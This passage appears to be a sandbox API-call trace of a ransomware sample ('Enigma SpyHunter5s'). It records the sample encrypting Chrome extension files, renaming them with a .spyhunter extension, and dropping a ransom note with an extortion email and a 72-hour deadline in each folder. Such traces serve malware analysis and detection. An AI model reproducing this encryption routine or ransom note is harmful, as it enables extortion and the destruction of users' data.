(lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.216] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eabc, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eabc*=0x2ac, lpOverlapped=0x0) returned 1 [0159.216] CloseHandle (hObject=0xb0) returned 1 [0159.216] GetProcessHeap () returned 0x2c0000 [0159.216] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07ac8 | out: hHeap=0x2c0000) returned 1 [0159.216] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea58 | out: pbBuffer=0x270ea58) returned 1 [0159.216] GetProcessHeap () returned 0x2c0000 [0159.217] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.217] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea50*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea50*=0x30) returned 1 [0159.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.218] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json") returned 166 [0159.218] StrStrW (lpFirst="verified_contents.json", lpSrch=".txt") returned 0x0 [0159.218] GetProcessHeap () returned 0x2c0000 [0159.218] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.218] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ea14*=0x2800, lpOverlapped=0x0) returned 1 [0159.326] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.326] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270ea14, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ea14*=0x2800, lpOverlapped=0x0) returned 1 [0159.326] GetProcessHeap () returned 0x2c0000 [0159.326] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.326] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.326] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea54*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea14, lpOverlapped=0x0 | out: lpBuffer=0x270ea54*, lpNumberOfBytesWritten=0x270ea14*=0x4, lpOverlapped=0x0) returned 1 [0159.327] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea14, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea14*=0x30, lpOverlapped=0x0) returned 1 [0159.327] CloseHandle (hObject=0xb0) returned 1 [0159.327] GetProcessHeap () returned 0x2c0000 [0159.327] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.327] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.spyhunter") returned 176 [0159.327] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_metadata\\verified_contents.json.spyhunter")) returned 1 [0159.328] GetProcessHeap () returned 0x2c0000 [0159.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.328] GetProcessHeap () returned 0x2c0000 [0159.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.328] GetProcessHeap () returned 0x2c0000 [0159.328] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fc6d20 | out: hHeap=0x2c0000) returned 1 [0159.329] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.329] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.329] WriteFile (in: hFile=0xb0, lpBuffer=0x270e98b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eab4, lpOverlapped=0x0 | out: lpBuffer=0x270e98b*, lpNumberOfBytesWritten=0x270eab4*=0x127, lpOverlapped=0x0) returned 1 [0159.331] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.331] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eab4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eab4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.331] CloseHandle (hObject=0xb0) returned 1 [0159.331] GetProcessHeap () returned 0x2c0000 [0159.331] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07468 | out: hHeap=0x2c0000) returned 1 [0159.331] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea50 | out: pbBuffer=0x270ea50) returned 1 [0159.331] GetProcessHeap () returned 0x2c0000 [0159.331] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.331] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea48*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea48*=0x30) returned 1 [0159.331] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.332] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json") returned 159 [0159.332] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.332] GetProcessHeap () returned 0x2c0000 [0159.332] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.332] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ea0c*=0x315, lpOverlapped=0x0) returned 1 [0159.377] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffceb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.377] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x315, lpNumberOfBytesWritten=0x270ea0c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ea0c*=0x315, lpOverlapped=0x0) returned 1 [0159.378] GetProcessHeap () returned 0x2c0000 [0159.378] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.378] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.378] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea4c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea0c, lpOverlapped=0x0 | out: lpBuffer=0x270ea4c*, lpNumberOfBytesWritten=0x270ea0c*=0x4, lpOverlapped=0x0) returned 1 [0159.378] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea0c, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea0c*=0x30, lpOverlapped=0x0) returned 1 [0159.378] CloseHandle (hObject=0xb0) returned 1 [0159.378] GetProcessHeap () returned 0x2c0000 [0159.378] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.378] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.spyhunter") returned 169 [0159.379] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\uk\\messages.json.spyhunter")) returned 1 [0159.380] GetProcessHeap () returned 0x2c0000 [0159.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.380] GetProcessHeap () returned 0x2c0000 [0159.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.380] GetProcessHeap () returned 0x2c0000 [0159.380] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f82060 | out: hHeap=0x2c0000) returned 1 [0159.380] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.381] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.381] WriteFile (in: hFile=0xb0, lpBuffer=0x270e983*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eaac, lpOverlapped=0x0 | out: lpBuffer=0x270e983*, lpNumberOfBytesWritten=0x270eaac*=0x127, lpOverlapped=0x0) returned 1 [0159.382] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.383] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eaac, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eaac*=0x2ac, lpOverlapped=0x0) returned 1 [0159.383] CloseHandle (hObject=0xb0) returned 1 [0159.383] GetProcessHeap () returned 0x2c0000 [0159.383] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f072d0 | out: hHeap=0x2c0000) returned 1 [0159.383] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea48 | out: pbBuffer=0x270ea48) returned 1 [0159.383] GetProcessHeap () returned 0x2c0000 [0159.384] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.384] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea40*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea40*=0x30) returned 1 [0159.384] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.384] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json") returned 159 [0159.385] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0159.385] GetProcessHeap () returned 0x2c0000 [0159.385] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0159.385] ReadFile (in: hFile=0xb0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270ea04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270ea04*=0x28a, lpOverlapped=0x0) returned 1 [0159.472] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xfffffd76, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0159.472] WriteFile (in: hFile=0xb0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x270ea04, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270ea04*=0x28a, lpOverlapped=0x0) returned 1 [0159.472] GetProcessHeap () returned 0x2c0000 [0159.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0159.472] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0159.472] WriteFile (in: hFile=0xb0, lpBuffer=0x270ea44*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270ea04, lpOverlapped=0x0 | out: lpBuffer=0x270ea44*, lpNumberOfBytesWritten=0x270ea04*=0x4, lpOverlapped=0x0) returned 1 [0159.472] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270ea04, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x270ea04*=0x30, lpOverlapped=0x0) returned 1 [0159.472] CloseHandle (hObject=0xb0) returned 1 [0159.472] GetProcessHeap () returned 0x2c0000 [0159.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0159.473] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.spyhunter") returned 169 [0159.473] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\tr\\messages.json.spyhunter")) returned 1 [0159.474] GetProcessHeap () returned 0x2c0000 [0159.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0159.474] GetProcessHeap () returned 0x2c0000 [0159.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0159.474] GetProcessHeap () returned 0x2c0000 [0159.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f81ed8 | out: hHeap=0x2c0000) returned 1 [0159.474] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0159.475] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0159.475] WriteFile (in: hFile=0xb0, lpBuffer=0x270e97b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270eaa4, lpOverlapped=0x0 | out: lpBuffer=0x270e97b*, lpNumberOfBytesWritten=0x270eaa4*=0x127, lpOverlapped=0x0) returned 1 [0159.476] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0159.476] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270eaa4, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270eaa4*=0x2ac, lpOverlapped=0x0) returned 1 [0159.476] CloseHandle (hObject=0xb0) returned 1 [0159.477] GetProcessHeap () returned 0x2c0000 [0159.477] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06ad8 | out: hHeap=0x2c0000) returned 1 [0159.477] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270ea40 | out: pbBuffer=0x270ea40) returned 1 [0159.477] GetProcessHeap () returned 0x2c0000 [0159.477] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0159.477] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x270ea38*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x270ea38*=0x30) returned 1 [0159.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\nmmhkkegccagdldgiimedpiccmgmieda\\1.0.0.2_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 